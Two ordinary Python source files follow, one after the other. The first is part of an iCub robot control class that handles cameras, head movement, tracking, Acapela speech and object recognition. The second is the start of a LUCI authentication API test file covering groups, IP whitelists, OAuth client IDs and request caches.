def return_left_camera_image(self, mode='RGB'):
"""Return a numpy array with the LEFT camera image
@param mode the image to return (default RGB)
RGB: Red Green Blue image
BGR: Blue Green Red (OpenCV)
GRAY: Grayscale image
"""
self.port_left_camera.read(self.yarp_image)
if(mode=='BGR'):
return cv2.cvtColor(self.img_array, cv2.COLOR_RGB2BGR)
elif(mode=='RGB'):
return self.img_array
elif(mode=='GRAY'):
return cv2.cvtColor(self.img_array, cv2.COLOR_BGR2GRAY)
else:
return self.img_array
def return_right_camera_image(self, mode='RGB'):
"""Return a numpy array with the RIGHT camera image
@param mode the image to return (default RGB)
RGB: Red Green Blue image
BGR: Blue Green Red (OpenCV)
GRAY: Grayscale image
"""
self.port_right_camera.read(self.yarp_image)
if(mode=='BGR'):
return cv2.cvtColor(self.img_array, cv2.COLOR_RGB2BGR)
elif(mode=='RGB'):
return self.img_array
elif(mode=='GRAY'):
return cv2.cvtColor(self.img_array, cv2.COLOR_BGR2GRAY)
else:
return self.img_array
def _set_pose_left_hand(self, x, y, z, ax, ay, az, theta):
""" This is a low level function which must be used carefully.
It allows setting the position and orientation of the left hand.
@param x: the x position (negative to move in front of the robot)
@param y: the y position (negative to move on the left side of the robot)
@param z: the z position (positive to move up)
@param ax: the x orientation (zero for hand touching the left leg)
@param ay: the y orientation (zero for hand touching left leg)
@param az: the z orientation (zero for hand touching the left leg)
@param theta: the angle theta
"""
bottle = yarp.Bottle()
bottle.clear()
bottle.addString('xd')
tmp0 = bottle.addList()
tmp0.addDouble(x)
tmp0.addDouble(y)
tmp0.addDouble(z)
tmp0.addDouble(ax)
tmp0.addDouble(ay)
tmp0.addDouble(az)
tmp0.addDouble(theta)
self.port_cart_leftarm.write(bottle)
#TODO: This function must be implemented for a safe object manipulation
# def move_left_hand_to_position(self, x, y, z):
# self._set_pose_left_hand(x, y, z, 0, 0, 0, 0)
def move_head_to_target_mono(self, type, u, v, z):
""" given a point in the image (mono) it moves the head
to that point.
WARNING: it requires iKinGazeCtrl to run.
@param type: left or right image (string)
@param u: the x coordinate of the point
@param v: the y coordinate of the point
@param z: the estimated depth in the eye coord frame
"""
bottle = yarp.Bottle()
bottle.clear()
bottle.addString(type)
bottle.addDouble(u)
bottle.addDouble(v)
bottle.addDouble(z)
self.port_ikin_mono.write(bottle)
def move_head_to_target_stereo(self, u_left, v_left, u_right, v_right):
""" Move the head to a point defined in the two image plane (stereo)
@param u_left: x coord in the left image
@param v_left: y coord in the left image
@param u_right: x coord in the right image
@param v_right: y coord in the right image
"""
bottle = yarp.Bottle()
bottle.clear()
bottle.addDouble(u_left)
bottle.addDouble(v_left)
bottle.addDouble(u_right)
bottle.addDouble(v_right)
self.port_ikin_stereo.write(bottle)
def move_head_to_point(self, x, y, z):
""" Given a point in the space it moves the head
in the direction of the point.
@param x: the x coord of the point
@param y: the y coord of the point
@param z: the z coord of the point
"""
bottle = yarp.Bottle()
bottle.clear()
bottle.addDouble(x)
bottle.addDouble(y)
bottle.addDouble(z)
self.port_ikin_xd.write(bottle)
def _move_head_random(self, delay=1.0):
t = threading.currentThread()
while getattr(t, "do_run", True):
roll = 0
pitch = random.randint(a=-30, b=+30)
yaw = random.randint(a=-20, b=+20)
bottle = yarp.Bottle()
result = yarp.Bottle()
# Set ROLL
bottle.clear()
bottle.addString("set")
bottle.addString("pos")
bottle.addInt(1) # Joint
bottle.addInt(roll) # Angle
self.rpc_client_head.write(bottle, result) # Send
# Set PITCH
bottle.clear()
bottle.addString("set")
bottle.addString("pos")
bottle.addInt(0) # Joint
bottle.addInt(pitch) # Angle
self.rpc_client_head.write(bottle, result) # Send
# Set YAW
bottle.clear()
bottle.addString("set")
bottle.addString("pos")
bottle.addInt(2) # Joint
bottle.addInt(yaw) # Angle
self.rpc_client_head.write(bottle, result) # Send
time.sleep(delay)
def _track_movement(self, template_path, delay=0.5):
""" Given a colour template it tracks the
@param delay:
@return:
"""
my_mask_analyser = BinaryMaskAnalyser()
t = threading.currentThread()
template = cv2.imread(template_path) # Load the image
my_back_detector = BackProjectionColorDetector() # Defining the deepgaze color detector object
my_back_detector.setTemplate(template) # Set the template
#cv2.namedWindow('filtered')
while getattr(t, "do_run", True):
#img_array = np.zeros((360,240,3), dtype=np.uint8)
img_array = self.return_left_camera_image(mode='BGR')
image_filtered = my_back_detector.returnFiltered(img_array, morph_opening=True,
blur=True, kernel_size=7, iterations=2)
cx, cy = my_mask_analyser.returnMaxAreaCenter(image_filtered)
if cx is not None:
cv2.circle(image_filtered,(cx,cy), 5, (0, 0, 255), -1)
bottle = yarp.Bottle()
bottle.clear()
bottle.addString('left')
bottle.addDouble(cx)
bottle.addDouble(cy)
bottle.addDouble(1.0)
self.port_ikin_mono.write(bottle)
#images_stack = np.hstack((img_array, image_filtered))
#cv2.imshow('filtered', images_stack)
#cv2.waitKey(100) #waiting 50 msec
time.sleep(0.1)
#cv2.destroyWindow('filtered')
def start_movement_detection(self, template_path, delay=1.0):
try:
if not self.thread_movement_detection.isAlive():
self.thread_movement_detection = threading.Thread(target=self._track_movement,
args=(template_path, delay,))
self.thread_movement_detection.start()
print "[ICUB] Head control thread started!"
except:
print "[ICUB][ERROR] unable to start head control thread"
def stop_movement_detection(self):
try:
if self.thread_movement_detection.isAlive():
self.thread_movement_detection.do_run = False
self.thread_movement_detection.join()
self.reset_head_pose() # reset the head
print "[ICUB] Head control thread stopped!"
except:
print "[ICUB][ERROR] unable to stop head control thread. Is it running?"
def is_movement_detection(self):
"""Check if the movement tracking is active
@return: return True if the movement tracking is active
"""
return self.thread_movement_detection.isAlive()
def set_head_pose(self, roll, pitch, yaw):
"""It sets the icub head using the RPC port
HEAD axes: 0=Pitch, 1=Roll, 2=Yaw
@param roll (degree) int
@param pitch (degree) int
@param yaw (degree) int
"""
bottle = yarp.Bottle()
result = yarp.Bottle()
return_tuple = [False, False, False]
#Set ROLL
bottle.clear()
bottle.addString("set")
bottle.addString("pos")
bottle.addInt(1) #Joint
bottle.addInt(roll) #Angle
self.rpc_client_head.write(bottle, result) #Send
if result == "[OK]":
return_tuple[0] = True
else:
return_tuple[0] = False
# Set PITCH
bottle.clear()
bottle.addString("set")
bottle.addString("pos")
bottle.addInt(0) # Joint
bottle.addInt(pitch) # Angle
self.rpc_client_head.write(bottle, result) # Send
if result == "[OK]":
return_tuple[1] = True
else:
return_tuple[1] = False
# Set YAW
bottle.clear()
bottle.addString("set")
bottle.addString("pos")
bottle.addInt(2) # Joint
bottle.addInt(yaw) # Angle
self.rpc_client_head.write(bottle, result) # Send
if result == "[OK]":
return_tuple[2] = True
else:
return_tuple[2] = False
return return_tuple  # per-joint acknowledgements
def reset_head_pose(self):
"""Reset the eyes and head position to 0,0,0
"""
bottle = yarp.Bottle()
result = yarp.Bottle()
#Set ROLL
bottle.clear()
bottle.addString("set")
bottle.addString("pos")
bottle.addInt(1) #Joint
bottle.addInt(0) #Angle
self.rpc_client_head.write(bottle, result) #Send
# Set PITCH
bottle.clear()
bottle.addString("set")
bottle.addString("pos")
bottle.addInt(0) # Joint
bottle.addInt(0) # Angle
self.rpc_client_head.write(bottle, result) # Send
# Set YAW
bottle.clear()
bottle.addString("set")
bottle.addString("pos")
bottle.addInt(2) # Joint
bottle.addInt(0) # Angle
self.rpc_client_head.write(bottle, result) # Send
# Set EYE-YAW
bottle.clear()
bottle.addString("set")
bottle.addString("pos")
bottle.addInt(3) # Joint
bottle.addInt(0) # Angle
self.rpc_client_head.write(bottle, result) # Send
# Set EYE-PITCH
bottle.clear()
bottle.addString("set")
bottle.addString("pos")
bottle.addInt(4) # Joint
bottle.addInt(0) # Angle
self.rpc_client_head.write(bottle, result) # Send
def get_3d_mono_angles(self, type, u, v, z):
""" returns the 3D point whose projected pixel coordinates (u,v)
in the image plane <type> ["left"|"right"] along with third
component <z> in the eye's reference frame are given.
It requires iKinGazeCtrl to run. In the simulator it should
be activated with: ./iKinGazeCtrl --from configSim.ini
WARNING: it has been hard to find a way to add a list
to a bottle; the icub documentation should be improved.
The trick is: tmp_var = bottle.addList() (see the standalone sketch at the end of this file).
@param type: 'left' or 'right' camera
@param u: pixel coordinate x
@param v: pixel coordinate y
@param z: third component point in front of the robot (eye reference frame)
@return: the 3D point (x,y,z) coordinates
"""
bottle = yarp.Bottle()
result = yarp.Bottle()
bottle.clear()
bottle.addString('get')
bottle.addString('3D')
bottle.addString('mono')
tmp0 = bottle.addList()
tmp0.addString(type)  # use the actual arguments instead of hard-coded test values
tmp0.addInt(u)
tmp0.addInt(v)
tmp0.addDouble(z)
self.rpc_client_head_ikin.write(bottle, result)
list_bottle = result.get(1).asList()
list_return = []
for i in range(list_bottle.size()):
list_return.append(list_bottle.get(i).asDouble())
return list_return
def get_3d_stereo_angles(self, u_left, v_left, u_right, v_right):
""" returns the 3D point whose projected pixel coordinates (u,v)
in the image plane <type> ["left"|"right"] along with third
component <z> in the eye's reference frame are given.
It requires iKinGaze to run. In the simulator mode should
be activated with: ./iKinGazeCtrl --from configSim.ini
WARNING: has been hard to find the way for adding a list
in a bottle, the icub documentation should be improved.
The trick is: tmp_var = bottle.addList()
@param type: 'let' or 'right' camera
@param u: pixel coordinate x
@param v: pixel coordinate y
@return: the 3D point (x,y,z) coordinates
"""
bottle = yarp.Bottle()
result = yarp.Bottle()
bottle.clear()
bottle.addString('get')
bottle.addString('3D')
bottle.addString('stereo')
tmp0 = bottle.addList()
tmp0.addInt(u_left)
tmp0.addInt(v_left)
tmp0.addInt(u_right)
tmp0.addInt(v_right)
self.rpc_client_head_ikin.write(bottle, result)
list_bottle = result.get(1).asList()
list_return = []
for i in range(list_bottle.size()):
list_return.append(list_bottle.get(i).asDouble())
return list_return
def set_acapela_credential(self, csv_path):
'''Load the ACAPELA config parameters
The first line of the CSV must contain:
account_login, application_login,
application_password, service_url.
@param csv_path the path to the config file
'''
with open(csv_path, 'rb') as csvfile:
reader = csv.reader(csvfile, delimiter=',')
for row in reader:
self.acapela_account_login = row[0]
self.acapela_application_login = row[1]
self.acapela_application_password = row[2]
self.acapela_service_url = row[3]
def get_acapela_credential(self):
'''Return the ACAPELA config parameters
'''
return self.acapela_account_login, self.acapela_application_login, \
self.acapela_application_password, self.acapela_service_url
def say_something(self, text, directory='/tmp/', in_background=True):
"""It says something using ACAPELA tts
@param text the string to say
@param directory the directory where the downloaded audio file is stored
@param in_background run the playback process in background
"""
print("[ICUB][ACAPELA] Downloading the mp3 file...")
tts_acapela = acapela.Acapela(self.acapela_account_login, self.acapela_application_login,
self.acapela_application_password, self.acapela_service_url,
quality='22k', directory=directory)
tts_acapela.prepare(text=text, lang='US', gender='M', intonation='NORMAL')
output_filename = tts_acapela.run()
print "[ICUB][ACAPELA] Recorded TTS to %s" % output_filename
subprocess.Popen(["play","-q",directory + str(output_filename)])
print "[ICUB][PLAY] reproducing the acapela file"
def learn_object_from_histogram(self, template, name):
"""Using the deepgaze histogram classifier to save an object.
@param template: the image template to store
@param name: the name of the model (must be a unique ID)
"""
self.histogram_classifier.addModelHistogram(template, name)
def remove_object_from_histogram(self, name):
"""Given an object remove it from the list
@param name: the name of the object.
@return: True if the object has been deleted
"""
return self.histogram_classifier.removeModelHistogramByName(name)
def recall_object_from_histogram(self, template):
"""Return the name of the object with the closest similarity to the template.
@param template: the image to recall
@return: the name of the object with closest similarity
"""
if self.histogram_classifier.returnSize() == 0:
return None
else:
return self.histogram_classifier.returnBestMatchIndexName(template, method="intersection")
"""
def main():
my_cub = iCub()
#my_cub.return_left_camera_image()
#print(my_cub.get_3d_mono_angles(type='left', u=0, v=0, z=0).toString())
#print(my_cub.get_3d_mono_angles(type='left', u=0, v=0, z=0).size())
#result = my_cub.get_3d_stereo_angles(u_left=23, v_left=20, u_right=35, v_right=20)
#print(result.size())
#print (result.get(1).isList())
#print(result.get(1).get(0).asDouble())
#print(yarpListToTuple(result.get(1).asList()))
#my_cub.move_head_to_target(type='left', u=50, v=50, z=0.5)
my_cub.reset_head_pose()
#my_cub.move_head_to_target_mono(type='left', u=0, v=0, z=0.5)
#time.sleep(2)
#my_cub.start_movement_detection()
#time.sleep(30)
#my_cub.stop_movement_detection()
my_cub._set_pose_left_hand(-0.1, -0.4, 0.0, 0, 0, 0, 0.0)
#my_cub.move_left_hand_to_position(-0.3, -0.3, 0.3)
if __name__ == "__main__":
main()
"""
|
api_test.py
|
#!/usr/bin/env vpython
# Copyright 2014 The LUCI Authors. All rights reserved.
# Use of this source code is governed under the Apache License, Version 2.0
# that can be found in the LICENSE file.
# Disable 'Access to a protected member', 'Unused argument', 'Unused variable'.
# pylint: disable=W0212,W0612,W0613
# pylint: disable=redefined-outer-name
import datetime
import sys
import threading
import unittest
from six.moves import queue
import mock
from test_support import test_env
test_env.setup_test_env()
from google.appengine.ext import ndb
from components.auth import api
from components.auth import config
from components.auth import ipaddr
from components.auth import model
from components.auth import realms
from components.auth import replication
from components.auth.proto import replication_pb2
from components.auth.proto import security_config_pb2
from components import utils
from test_support import test_case
def new_auth_db(
replication_state=None,
global_config=None,
groups=None,
ip_whitelist_assignments=None,
ip_whitelists=None,
internal_service_regexp=None,
additional_client_ids=None
):
global_config = global_config or model.AuthGlobalConfig()
global_config.security_config = security_config_blob(internal_service_regexp)
return api.AuthDB.from_entities(
replication_state=replication_state or model.AuthReplicationState(),
global_config=global_config,
groups=groups or [],
ip_whitelist_assignments=(
ip_whitelist_assignments or model.AuthIPWhitelistAssignments()),
ip_whitelists=ip_whitelists or [],
additional_client_ids=additional_client_ids or [])
def security_config_blob(regexps=None):
regexps = regexps or ['(.*-dot-)?internal\\.example\\.com']
msg = security_config_pb2.SecurityConfig(internal_service_regexp=regexps)
return msg.SerializeToString()
class AuthDBTest(test_case.TestCase):
"""Tests for AuthDB class."""
def setUp(self):
super(AuthDBTest, self).setUp()
self.mock(api.logging, 'warning', lambda *_args: None)
self.mock(api.logging, 'error', lambda *_args: None)
def test_get_group(self):
g = model.AuthGroup(
key=model.group_key('group'),
members=[
model.Identity.from_bytes('user:b@example.com'),
model.Identity.from_bytes('user:a@example.com'),
],
globs=[model.IdentityGlob.from_bytes('user:*')],
nested=['blah'],
created_by=model.Identity.from_bytes('user:x@example.com'),
created_ts=datetime.datetime(2014, 1, 2, 3, 4, 5),
modified_by=model.Identity.from_bytes('user:y@example.com'),
modified_ts=datetime.datetime(2015, 1, 2, 3, 4, 5))
db = new_auth_db(groups=[g])
# Unknown group.
self.assertIsNone(db.get_group('blah'))
# Known group.
from_cache = db.get_group('group')
self.assertEqual(from_cache.key, g.key)
# Members list is sorted.
self.assertEqual(from_cache.members, [
model.Identity.from_bytes('user:a@example.com'),
model.Identity.from_bytes('user:b@example.com'),
])
# Fields that are known to be different.
exclude = ['members', 'auth_db_rev', 'auth_db_prev_rev']
self.assertEqual(
from_cache.to_dict(exclude=exclude),
g.to_dict(exclude=exclude))
def test_is_group_member(self):
# Test identity.
joe = model.Identity(model.IDENTITY_USER, 'joe@example.com')
# Group that includes joe via glob.
with_glob = model.AuthGroup(id='WithGlob')
with_glob.globs.append(
model.IdentityGlob(model.IDENTITY_USER, '*@example.com'))
# Group that includes joe via explicit listing.
with_listing = model.AuthGroup(id='WithListing')
with_listing.members.append(joe)
# Group that includes joe via nested group.
with_nesting = model.AuthGroup(id='WithNesting')
with_nesting.nested.append('WithListing')
# Creates AuthDB with given list of groups and then runs the check.
is_member = (lambda groups, ident, group:
new_auth_db(groups=groups).is_group_member(group, ident))
# Wildcard group includes everyone (even anonymous).
self.assertTrue(is_member([], joe, '*'))
self.assertTrue(is_member([], model.Anonymous, '*'))
# An unknown group includes nobody.
self.assertFalse(is_member([], joe, 'Missing'))
self.assertFalse(is_member([], model.Anonymous, 'Missing'))
# Globs are respected.
self.assertTrue(is_member([with_glob], joe, 'WithGlob'))
self.assertFalse(is_member([with_glob], model.Anonymous, 'WithGlob'))
# Members lists are respected.
self.assertTrue(is_member([with_listing], joe, 'WithListing'))
self.assertFalse(is_member([with_listing], model.Anonymous, 'WithListing'))
# Nested groups are respected.
self.assertTrue(is_member([with_nesting, with_listing], joe, 'WithNesting'))
self.assertFalse(
is_member([with_nesting, with_listing], model.Anonymous, 'WithNesting'))
def test_list_group(self):
def list_group(groups, group, recursive):
l = new_auth_db(groups=groups).list_group(group, recursive)
return api.GroupListing(
sorted(l.members), sorted(l.globs), sorted(l.nested))
grp_1 = model.AuthGroup(id='1')
grp_1.members.extend([
model.Identity(model.IDENTITY_USER, 'a@example.com'),
model.Identity(model.IDENTITY_USER, 'b@example.com'),
])
grp_1.globs.extend([
model.IdentityGlob(model.IDENTITY_USER, '*@a.example.com'),
model.IdentityGlob(model.IDENTITY_USER, '*@b.example.com'),
])
grp_2 = model.AuthGroup(id='2')
grp_2.nested.append('1')
grp_2.members.extend([
# Specify 'b' again, even though it's in a nested group.
model.Identity(model.IDENTITY_USER, 'b@example.com'),
model.Identity(model.IDENTITY_USER, 'c@example.com'),
])
grp_2.globs.extend([
# Specify '*@b.example.com' again, even though it's in a nested group.
model.IdentityGlob(model.IDENTITY_USER, '*@b.example.com'),
model.IdentityGlob(model.IDENTITY_USER, '*@c.example.com'),
])
# Unknown group.
empty = api.GroupListing([], [], [])
self.assertEqual(empty, list_group([grp_1, grp_2], 'blah', False))
self.assertEqual(empty, list_group([grp_1, grp_2], 'blah', True))
# Non recursive.
expected = api.GroupListing(
members=[
model.Identity(model.IDENTITY_USER, 'b@example.com'),
model.Identity(model.IDENTITY_USER, 'c@example.com'),
],
globs=[
model.IdentityGlob(model.IDENTITY_USER, '*@b.example.com'),
model.IdentityGlob(model.IDENTITY_USER, '*@c.example.com'),
],
nested=['1'])
self.assertEqual(expected, list_group([grp_1, grp_2], '2', False))
# Recursive.
expected = api.GroupListing(
members=[
model.Identity(model.IDENTITY_USER, 'a@example.com'),
model.Identity(model.IDENTITY_USER, 'b@example.com'),
model.Identity(model.IDENTITY_USER, 'c@example.com'),
],
globs=[
model.IdentityGlob(model.IDENTITY_USER, '*@a.example.com'),
model.IdentityGlob(model.IDENTITY_USER, '*@b.example.com'),
model.IdentityGlob(model.IDENTITY_USER, '*@c.example.com'),
],
nested=['1'])
self.assertEqual(expected, list_group([grp_1, grp_2], '2', True))
def test_nested_groups_cycle(self):
# Groups that nest each other.
group1 = model.AuthGroup(id='Group1')
group1.nested.append('Group2')
group2 = model.AuthGroup(id='Group2')
group2.nested.append('Group1')
# Collect warnings.
warnings = []
self.mock(api.logging, 'warning', lambda msg, *_args: warnings.append(msg))
# This should not hang, but produce error message.
auth_db = new_auth_db(groups=[group1, group2])
self.assertFalse(
auth_db.is_group_member('Group1', model.Anonymous))
self.assertEqual(1, len(warnings))
self.assertTrue('Cycle in a group graph' in warnings[0])
def test_not_real_nested_group_cycle_aka_issue_251(self):
# See https://github.com/luci/luci-py/issues/251.
#
# B -> A, C -> [B, A]. When traversing C, A is seen twice, and this is fine.
group_A = model.AuthGroup(id='A')
group_B = model.AuthGroup(id='B')
group_C = model.AuthGroup(id='C')
group_B.nested = ['A']
group_C.nested = ['A', 'B']
db = new_auth_db(groups=[group_A, group_B, group_C])
# 'is_group_member' must not report 'Cycle in a group graph' warning.
warnings = []
self.mock(api.logging, 'warning', lambda msg, *_args: warnings.append(msg))
self.assertFalse(db.is_group_member('C', model.Anonymous))
self.assertFalse(warnings)
def test_is_allowed_oauth_client_id(self):
global_config = model.AuthGlobalConfig(
oauth_client_id='1',
oauth_additional_client_ids=['2', '3'])
auth_db = new_auth_db(
global_config=global_config,
additional_client_ids=['local'])
self.assertFalse(auth_db.is_allowed_oauth_client_id(None))
self.assertTrue(auth_db.is_allowed_oauth_client_id('1'))
self.assertTrue(auth_db.is_allowed_oauth_client_id('2'))
self.assertTrue(auth_db.is_allowed_oauth_client_id('3'))
self.assertTrue(auth_db.is_allowed_oauth_client_id('local'))
self.assertTrue(
auth_db.is_allowed_oauth_client_id(api.API_EXPLORER_CLIENT_ID))
self.assertFalse(auth_db.is_allowed_oauth_client_id('4'))
def test_fetch_auth_db_lazy_bootstrap(self):
# Don't exist before the call.
self.assertFalse(model.root_key().get())
# Run bootstrap.
api._lazy_bootstrap_ran = False
api.fetch_auth_db()
# Exist now.
self.assertTrue(model.root_key().get())
# Simulate datastore wipe which can happen in tests, verify fetch_auth_db
# still works. It hits slightly different code path since wiping datastore
# doesn't reset _lazy_bootstrap_ran global var.
model.root_key().delete()
api.fetch_auth_db()
def run_auth_db_fetch_test(self, setup_cb):
now = utils.utcnow()
ident = model.Identity.from_bytes('user:a@example.com')
# Client IDs callback. Disable config.ensure_configured() since it overrides
# _additional_client_ids_cb after we mock it.
self.mock(config, 'ensure_configured', lambda: None)
self.mock(api, '_additional_client_ids_cb', lambda: ['', 'cb_client_id'])
self.mock(api, 'get_web_client_id', lambda: 'web_client_id')
# Create AuthGlobalConfig.
global_config = model.AuthGlobalConfig(key=model.root_key())
global_config.oauth_client_id = '1'
global_config.oauth_client_secret = 'secret'
global_config.oauth_additional_client_ids = ['2', '3']
global_config.security_config = security_config_blob()
global_config.token_server_url = 'token_server_url'
global_config.put()
# What we expect to see in the AuthDB.
expected_groups = {}
def add_group(name, members, globs, nested, owners):
expected_groups[name] = (
frozenset(members),
tuple(model.IdentityGlob.from_bytes(g) for g in globs),
tuple(nested),
owners,
)
model.AuthGroup(
key=model.group_key(name),
members=[model.Identity.from_bytes(m) for m in members],
globs=[model.IdentityGlob.from_bytes(g) for g in globs],
nested=nested,
owners=owners,
created_ts=now,
created_by=ident,
modified_ts=now,
modified_by=ident,
).put()
# Create a bunch of groups.
add_group(
name='Group A',
members=['user:a@example.com', 'user:b@example.com'],
globs=['user:*@example.com'],
nested=['Group B', 'Group C'],
owners='Group A')
add_group(
name='Group B',
members=['user:c@example.com'],
globs=['user:*@example.com'],
nested=[],
owners='Group A')
add_group(
name='Group C',
members=[],
globs=[],
nested=[],
owners='Group C')
# And a bunch of IP whitelists.
model.AuthIPWhitelistAssignments(
key=model.ip_whitelist_assignments_key(),
assignments=[
model.AuthIPWhitelistAssignments.Assignment(
identity=model.Anonymous,
ip_whitelist='some ip whitelist',
created_ts=now,
created_by=ident,
comment='comment',
),
],
).put()
model.AuthIPWhitelist(
key=model.ip_whitelist_key('some ip whitelist'),
subnets=['127.0.0.1/32'],
description='description',
created_ts=now,
created_by=ident,
modified_ts=now,
modified_by=ident,
).put()
model.AuthIPWhitelist(
key=model.ip_whitelist_key('bots'),
subnets=['127.0.0.1/32'],
description='description',
created_ts=now,
created_by=ident,
modified_ts=now,
modified_by=ident,
).put()
if setup_cb:
setup_cb()
# Verify all the stuff above ends up in the auth_db.
auth_db = api.fetch_auth_db()
# global_config and additional_client_ids_cb
self.assertEqual('token_server_url', auth_db.token_server_url)
self.assertEqual(('1', 'secret', ['2', '3']), auth_db.get_oauth_config())
self.assertTrue(auth_db.is_allowed_oauth_client_id('1'))
self.assertTrue(auth_db.is_allowed_oauth_client_id('cb_client_id'))
self.assertTrue(auth_db.is_allowed_oauth_client_id('web_client_id'))
self.assertFalse(auth_db.is_allowed_oauth_client_id(''))
# Groups.
self.assertEqual(
expected_groups,
{
name: (g.members, g.globs, g.nested, g.owners)
for name, g in auth_db._groups.items()
})
# IP whitelists and whitelist assignments.
self.assertEqual(
{model.Anonymous: 'some ip whitelist'},
auth_db._ip_whitelist_assignments)
self.assertEqual(
{'bots': ['127.0.0.1/32'], 'some ip whitelist': ['127.0.0.1/32']},
auth_db._ip_whitelists)
return auth_db
def test_fetch_auth_db_from_entities(self):
auth_db = self.run_auth_db_fetch_test(None)
self.assertEqual('from_entities', auth_db._from_what)
def test_fetch_auth_db_from_snapshot(self):
PRIMARY_ID = 'primary_id'
PRIMARY_URL = 'https://primary_url'
AUTH_DB_REV = 12345
def setup_snapshot():
# Create AuthDB snapshot entities from existing "detailed" entities in
# the datastore.
_, snap = replication.new_auth_db_snapshot()
# Switch into Replica mode, store the snapshot.
model.AuthReplicationState(
key=model.replication_state_key(),
primary_id=PRIMARY_ID,
primary_url=PRIMARY_URL,
auth_db_rev=AUTH_DB_REV,
shard_ids=replication.store_sharded_auth_db(
auth_db=replication.auth_db_snapshot_to_proto(snap),
primary_url=PRIMARY_URL,
auth_db_rev=AUTH_DB_REV,
shard_size=100,
),
).put()
auth_db = self.run_auth_db_fetch_test(setup_snapshot)
self.assertEqual('from_proto', auth_db._from_what)
self.assertEqual(PRIMARY_ID, auth_db.primary_id)
self.assertEqual(PRIMARY_URL, auth_db.primary_url)
self.assertEqual(AUTH_DB_REV, auth_db.auth_db_rev)
def test_get_secret_bootstrap(self):
# Mock AuthSecret.bootstrap to capture calls to it.
original = api.model.AuthSecret.bootstrap
calls = []
@classmethod
def mocked_bootstrap(cls, name):
calls.append(name)
result = original(name)
result.values = ['123']
return result
self.mock(api.model.AuthSecret, 'bootstrap', mocked_bootstrap)
auth_db = new_auth_db()
got = auth_db.get_secret(api.SecretKey('some_secret'))
self.assertEqual(['123'], got)
self.assertEqual(['some_secret'], calls)
def test_is_in_ip_whitelist(self):
auth_db = new_auth_db(ip_whitelists=[
model.AuthIPWhitelist(
key=model.ip_whitelist_key('l'),
subnets=['127.0.0.1', '192.168.0.0/24']),
])
test = lambda ip: auth_db.is_in_ip_whitelist('l', ipaddr.ip_from_string(ip))
self.assertTrue(test('127.0.0.1'))
self.assertTrue(test('192.168.0.0'))
self.assertTrue(test('192.168.0.9'))
self.assertTrue(test('192.168.0.255'))
self.assertFalse(test('192.168.1.0'))
self.assertFalse(test('192.1.0.0'))
@staticmethod
def make_auth_db_with_ip_whitelist():
"""AuthDB with a@example.com assigned IP whitelist '127.0.0.1/32'."""
return new_auth_db(
ip_whitelists=[
model.AuthIPWhitelist(
key=model.ip_whitelist_key('some ip whitelist'),
subnets=['127.0.0.1/32'],
),
model.AuthIPWhitelist(
key=model.ip_whitelist_key('bots'),
subnets=['192.168.1.1/32', '::1/32'],
),
],
ip_whitelist_assignments=model.AuthIPWhitelistAssignments(
assignments=[
model.AuthIPWhitelistAssignments.Assignment(
identity=model.Identity(model.IDENTITY_USER, 'a@example.com'),
ip_whitelist='some ip whitelist',)
],
),
)
def test_verify_ip_whitelisted_ok(self):
# Should not raise: IP is whitelisted.
ident = model.Identity(model.IDENTITY_USER, 'a@example.com')
self.make_auth_db_with_ip_whitelist().verify_ip_whitelisted(
ident, ipaddr.ip_from_string('127.0.0.1'))
def test_verify_ip_whitelisted_not_whitelisted(self):
with self.assertRaises(api.AuthorizationError):
self.make_auth_db_with_ip_whitelist().verify_ip_whitelisted(
model.Identity(model.IDENTITY_USER, 'a@example.com'),
ipaddr.ip_from_string('192.168.0.100'))
def test_verify_ip_whitelisted_not_assigned(self):
# Should not raise: whitelist is not required for another_user@example.com.
ident = model.Identity(model.IDENTITY_USER, 'another_user@example.com')
self.make_auth_db_with_ip_whitelist().verify_ip_whitelisted(
ident, ipaddr.ip_from_string('192.168.0.100'))
def test_verify_ip_whitelisted_missing_whitelist(self):
auth_db = new_auth_db(
ip_whitelist_assignments=model.AuthIPWhitelistAssignments(
assignments=[
model.AuthIPWhitelistAssignments.Assignment(
identity=model.Identity(model.IDENTITY_USER, 'a@example.com'),
ip_whitelist='missing ip whitelist',)
],
),
)
with self.assertRaises(api.AuthorizationError):
auth_db.verify_ip_whitelisted(
model.Identity(model.IDENTITY_USER, 'a@example.com'),
ipaddr.ip_from_string('127.0.0.1'))
def test_is_internal_domain(self):
auth_db = new_auth_db(internal_service_regexp=[
'(.*-dot-)?a-int\\.example\\.com',
'(.*-dot-)?b-int\\.example\\.com',
])
self.assertTrue(auth_db.is_internal_domain('a-int.example.com'))
self.assertTrue(auth_db.is_internal_domain('b-int.example.com'))
self.assertTrue(auth_db.is_internal_domain('z-dot-a-int.example.com'))
self.assertTrue(auth_db.is_internal_domain('z-dot-b-int.example.com'))
self.assertFalse(auth_db.is_internal_domain('int.example.com'))
self.assertFalse(auth_db.is_internal_domain('a-int.example'))
self.assertFalse(auth_db.is_internal_domain('dot-a-int.example.com'))
def mock_replication_state(auth_db_rev):
return model.AuthReplicationState(
key=model.replication_state_key(),
primary_id='primary-id',
auth_db_rev=auth_db_rev)
class TestAuthDBCache(test_case.TestCase):
"""Tests for process-global and request-local AuthDB cache."""
def setUp(self):
super(TestAuthDBCache, self).setUp()
api.reset_local_state()
def set_time(self, ts):
"""Mocks time.time() to return |ts|."""
self.mock(api.time, 'time', lambda: ts)
def set_fetched_auth_db(self, auth_db):
"""Mocks fetch_auth_db to return |auth_db|."""
def mock_fetch_auth_db(known_auth_db=None):
if (known_auth_db is not None and
auth_db.auth_db_rev == known_auth_db.auth_db_rev):
return known_auth_db
return auth_db
self.mock(api, 'fetch_auth_db', mock_fetch_auth_db)
def test_get_request_cache_different_threads(self):
"""Ensure get_request_cache() respects multiple threads."""
# Runs in its own thread.
def thread_proc():
request_cache = api.reinitialize_request_cache()
self.assertTrue(request_cache)
# Returns same object in a context of a same request thread.
self.assertTrue(api.get_request_cache() is request_cache)
return request_cache
# Launch two threads running 'thread_proc', wait for them to stop, collect
# whatever they return.
results_queue = queue.Queue()
threads = [
threading.Thread(target=lambda: results_queue.put(thread_proc()))
for _ in range(2)
]
for t in threads:
t.start()
results = [results_queue.get(timeout=1) for _ in range(len(threads))]
# Different threads use different RequestCache objects.
self.assertTrue(results[0] is not results[1])
def test_get_request_cache_different_requests(self):
"""Ensure get_request_cache() returns new object for a new request."""
# Grab request cache for 'current' request.
request_cache = api.reinitialize_request_cache()
# Track calls to 'close'.
close_calls = []
self.mock(request_cache, 'close', lambda: close_calls.append(1))
# Should return a new instance of request cache now.
self.assertTrue(api.reinitialize_request_cache() is not request_cache)
# Old one should have been closed.
self.assertEqual(1, len(close_calls))
